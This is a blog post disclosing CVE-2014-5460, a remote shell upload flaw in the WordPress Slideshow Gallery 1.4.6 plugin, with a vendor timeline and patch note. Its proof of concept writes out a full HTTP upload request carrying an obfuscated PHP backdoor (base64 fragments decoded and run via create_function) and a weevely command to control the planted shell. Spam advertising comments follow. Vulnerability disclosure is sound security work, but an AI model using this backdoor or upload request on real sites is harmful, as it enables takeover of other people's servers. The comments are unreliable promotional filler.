viernes, 29 de agosto de 2014

WordPress Slideshow Gallery 1.4.6 Shell Upload Vulnerability (CVE-2014-5460)

WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability.

Vendor Homepage: http://tribulant.com/
Software: Slideshow Gallery
Version: 1.4.6
Software Link: http://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
Tested on: Windows 7 OS, Wordpress 3.9.2 and Chrome Browser.

Description:

I found a serious security vulnerability in the Slideshow Gallery plugin. This bug allows an attacker to upload any php file remotely to the vulnerable website (administrator by default).

I have tested and verified that having the current version of the plugin installed in a WordPress installation will allow any registered user (Administrator, Editor, Author, Contributor and Subscriber), to upload a PHP shell to exploit the host system. 

Backdoor location: http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php

Today (2014-08-29), I did the notification to vendor and they gave me feedback about the vulnerability by email. The vendor has released a patch a few hours ago. (SlideShow Gallery version 1.4.7 at https://wordpress.org/plugins/slideshow-gallery/changelog).

Slideshow Gallery 1.4.7
FIX: Possible shell exploit by uploading PHP file as slide

Proof of Concept (PoC):

1.An attacker uploads a PHP shell file (i.e. backdoor.php):

POST http://192.168.31.128/wordpress/wp-admin/admin.php?page=slideshow-slides&method=save HTTP/1.1
Content-Type: multipart/form-data
Content-Disposition: form-data; name="image_file"; filename="backdoor.php"
Content-Type: application/octet-stream
<?php
$kvgk = str_replace("y","","ysytyry_yreypylyayce");
$dawj="pdGV4cGxvaXQnO2VzhjaGzh8gJzwnLiRrzhLic+JzzhtldmFsKGJhc2U2NF9kZWNvZGUz";
$asrp="gnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKzhCRhKS0zKSkpKSk7ZWzhNobyAnPC8nLzhiRrLic+Jzt9";
$gxfr="hocHJlZ19yzhZXBsYzhWNlKzhGFycmF5KCcvW15cdz1cc1zh0vJywnzhLzh1xzzhLycpLCBhcnJheSzh";
$fdcd="JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihzhyZXNldCgkYSk9PSd3zhaCcgJiYgJGMzhoJGEpPjMpezhyRrPSd";
$uuod = $kvgk("j", "", "bjase6j4j_jdjejcjojde");
$qcon = $kvgk("av","","avcraveaavteav_avfavuavnavcavtiavoavn");
$rpgy = $qcon('', $uuod($kvgk("zh", "", $fdcd.$dawj.$gxfr.$asrp))); $rpgy();
?>

2.The backdoor is located at http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php
3.The attacker uses a security tool (i.e. weevely) in order to communicate with the backdoor.

#weevely http://VICTIM/wordpress/wp-content/uploads/slideshow-gallery/backdoor.php whitexploit

4.Now the attacker has a “telnet-like console”. Finally, the attacker has the remote control of the vulnerable website.

Vulnerability Disclosure Timeline:

2014-08-28: Discovered vulnerability
2014-08-29: Vendor Notification (support@tribulant.com)
2014-08-29: Vendor Response/Feedback
2014-08-29: Vendor Fix/Patch
2014-08-30: Public Disclosure

Found by: Jesús Ramírez Pichardo
@whitexploit
http://whitexploit.blogspot.mx/

Date: 2014-08-28

Vulnerability Advisory and Proof of Concept (PDF).
Video demostración del ataque CVE-2014-5460.

7 comentarios:

  1. Thanks for sharing this . Currently looking at the best technique for a members site so very useful for me. Just Visit

    ResponderEliminar
  2. It’s great article as usual. You always write brief and informative articles. That’s why I,m your fan. Thanks! I'm from awaz

    ResponderEliminar
  3. Agilestorelocator is a premium WordPress plugin that is using Google Maps API V3 to render Stores List with markers to find location on Google Map. Get Plugin is for WordPress easily. Here are options for the Store Locator WordPress, Location finder WordPress, plugin is for WordPress.

    ResponderEliminar